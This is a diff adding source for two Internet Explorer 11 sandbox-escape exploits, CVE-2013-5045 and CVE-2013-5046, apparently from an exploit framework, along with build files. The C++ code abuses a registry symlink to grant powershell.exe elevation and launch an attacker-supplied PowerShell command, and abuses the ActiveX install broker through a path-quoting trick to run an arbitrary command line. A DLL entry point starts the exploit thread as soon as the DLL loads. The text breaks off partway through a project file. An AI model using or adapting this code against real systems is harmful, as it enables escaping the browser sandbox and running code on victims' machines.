+	[Embed(source="binary_data", mimeType="application/octet-stream")]
+	public class Graph_Shad extends ByteArrayAsset
+	{
+
+	}
+}

external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp

@@ -0,0 +1,184 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <winternl.h>
+#include <IEPMapi.h>
+
+#define MAX_ENV 32767
+
+#pragma comment(lib, "Iepmapi.lib")
+
+typedef NTSTATUS (__stdcall *fNtOpenSection)(
+	_Out_  PHANDLE SectionHandle,
+	_In_   ACCESS_MASK DesiredAccess,
+	_In_   POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+HANDLE MyCreateProcess(bstr_t exec, bstr_t cmdline)
+{
+	STARTUPINFO startInfo = { 0 };
+	PROCESS_INFORMATION procInfo = { 0 };	
+
+	if (!CreateProcess(exec, cmdline, NULL, NULL, FALSE, 0, NULL, NULL,
+		&startInfo, &procInfo))
+	{
+		DebugPrintf("Error Creating Process: %d", GetLastError());
+
+		return nullptr;
+	}
+	else
+	{
+		CloseHandle(procInfo.hThread);
+
+		return procInfo.hProcess;
+	}
+}
+
+bstr_t GetExploitUrl(LPWSTR env)
+{
+	WCHAR buf[MAX_ENV];
+
+	GetEnvironmentVariable(env, buf, MAX_ENV);
+
+	return buf;
+}
+
+void CreateIEProcess()
+{
+	HANDLE hProcess = MyCreateProcess(GetExecutableFileName(nullptr), L"iexplore.exe " + GetExploitUrl(L"HTML_URL"));
+
+	if (hProcess)
+	{
+		WaitForSingleObject(hProcess, 1000);
+		CloseHandle(hProcess);
+	}
+}
+
+void CreateUserKey(LPCWSTR path)
+{
+	STARTUPINFO startInfo = { 0 };
+	PROCESS_INFORMATION procInfo = { 0 };
+	bstr_t sid = GetUserSid();
+
+	bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain";
+
+	LONG res = RegDeleteKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain");
+
+	DebugPrintf("Delete: %d", res);
+
+	bstr_t destName = L"\\Registry\\User\\" + sid + path;
+
+	CreateLink(linkName, destName, 0);
+
+	CreateIEProcess();
+
+	DeleteLink(linkName);
+}
+
+void DoRegistrySymlink()
+{
+	STARTUPINFO startInfo = { 0 };
+	PROCESS_INFORMATION procInfo = { 0 };
+	HKEY hKey = nullptr;	
+	HANDLE hSection = nullptr;
+	bstr_t sid = GetUserSid();
+	bool success = false;	
+
+	try
+	{
+		CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights");
+		CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy");
+		CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}");
+
+		LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}",
+			0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
+
+		if (res != 0)
+		{
+			DebugPrintf("Open Class Key Failed %d", res);
+			throw 0;
+		}
+
+		CreateRegistryValueString(hKey, L"AppName", L"powershell.exe");
+		CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0");
+		CreateRegistryValueDword(hKey, L"Policy", 3);
+
+		bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_";
+
+		UNICODE_STRING objName = { 0 };
+		objName.Buffer = name;
+		objName.Length = SysStringByteLen(name);
+		objName.MaximumLength = SysStringByteLen(name);
+
+		OBJECT_ATTRIBUTES objAttr = { 0 };
+
+		InitializeObjectAttributes(&objAttr, &objName, OBJ_CASE_INSENSITIVE, 0, 0);
+
+		fNtOpenSection pfNtOpenSection = (fNtOpenSection)GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenSection");
+	
+		NTSTATUS status = pfNtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr);
+
+		if (status != 0)
+		{
+			DebugPrintf("Error opening section: %08X\n", status);
+			throw 0;
+		}
+
+		unsigned int* p = (unsigned int*)MapViewOfFile(hSection, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, sizeof(unsigned int));
+
+		if (p == nullptr)
+		{
+			DebugPrintf("Error mapping section %d\n", GetLastError());
+			throw 0;
+		}
+
+		DebugPrintf("Current Counter: %d\n", *p);
+
+		// Increment
+		*p = *p + 1;
+
+		DebugPrintf("New Counter: %d\n", *p);
+
+		UnmapViewOfFile(p);
+		CloseHandle(hSection);
+		hSection = nullptr;
+
+		MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD"));
+	}
+	catch (...)
+	{
+	}
+
+	if (hSection)
+	{
+		CloseHandle(hSection);
+	}
+	
+	if (hKey)
+	{
+		RegCloseKey(hKey);
+	}
+
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(nullptr);	
+	DoRegistrySymlink();
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);
+}

external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj

@@ -0,0 +1,188 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+    <ProjectName>CVE-2013-5045</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2013-5045.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp

@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+

external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h

@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>

external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h

@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>

external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp

@@ -0,0 +1,127 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <Utils.h>
+#include <Shlwapi.h>
+
+#pragma comment(lib, "shlwapi.lib")
+
+typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
+
+void DoAXExploit()
+{
+	try
+	{
+		HRESULT ret = E_FAIL;
+
+		IIEUserBrokerPtr broker = CreateBroker();
+
+		DebugPrintf("Created User Broker: %p\n", broker);
+
+		IIEAxInstallBrokerBrokerPtr axInstallBroker = broker;
+
+		DebugPrintf("Created AX Install Broker: %p\n", axInstallBroker);
+
+		IUnknownPtr unk;
+
+		ret = axInstallBroker->BrokerGetAxInstallBroker(__uuidof(CIEAxInstallBroker), IID_IUnknown, 0, 2, nullptr, &unk);
+		if (FAILED(ret))
+		{
+			DebugPrintf("Failed to create install broker\n");
+			throw _com_error(ret);
+		}
+
+		IIeAxiAdminInstallerPtr admin = unk;
+				
+		bstr_t sessionGuid;
+		bstr_t empty;
+
+		ret = admin->InitializeAdminInstaller(empty, empty, sessionGuid.GetAddress());
+		if (FAILED(ret))
+		{
+			DebugPrintf("Failed initialize admin interface\n");
+			throw _com_error(ret);
+		}
+			
+		DebugPrintf("Initialize: %ls\n", sessionGuid.GetBSTR());
+
+		IIeAxiInstaller2Ptr installer = unk;
+
+		DebugPrintf("Installer: %p", installer);
+
+		unsigned char* details = nullptr;
+		unsigned int detailsLength = 0;
+
+		CLSID mgrclsid;
+
+		// Not important really
+		CLSIDFromString(L"4871A87A-BFDD-4106-8153-FFDE2BAC2967", &mgrclsid);
+
+		/*bstr_t url = L"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8";
+		bstr_t path = L"C:\\users\\user\\desktop\\dlm-activex-2.2.4.8.cab";*/
+
+		bstr_t path = GetWindowsSystemDirectory() + L"\\notepad.exe";
+
+		bstr_t fullPath;			
+
+		// Verify a local "signed" file, doesn't really matter what, we are not going to run it
+		ret = installer->VerifyFile(sessionGuid, nullptr, path, path, bstr_t(L""),
+			0, 0, mgrclsid, fullPath.GetAddress(), &detailsLength, &details);
+
+		if (FAILED(ret))
+		{
+			throw _com_error(ret);
+		}
+
+		WCHAR newPath[MAX_PATH];
+
+		wcscpy_s(newPath, fullPath);
+
+		PathRemoveFileSpec(newPath);
+
+		// Install file to dummy location, use canonicalization trick to escape quotes later
+		ret = installer->InstallFile(sessionGuid, nullptr, bstr_t(newPath), bstr_t(PathFindFileName(fullPath)),
+			GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp", bstr_t(L"testbin.exe"), 0);
+		DebugPrintf("InstallFile: %08X\n", ret);
+
+		if (FAILED(ret))
+		{
+			throw _com_error(ret);
+		}
+
+		bstr_t installPath = GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp\\testbin.exe";
+
+		PROCESS_INFORMATION procInfo = { 0 };
+
+		// Run our arbitrary command line
+		ret = installer->RegisterExeFile(sessionGuid, installPath, 0, &procInfo);
+	}
+	catch (_com_error e)
+	{
+		DebugPrintf("Error: %ls\n", e.ErrorMessage());
+	}	
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(NULL);
+
+	DoAXExploit();
+
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);	
+}

external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj

@@ -0,0 +1,182 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{7A9AC14A-00BC-4A69-9B86-C80635606FEA}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
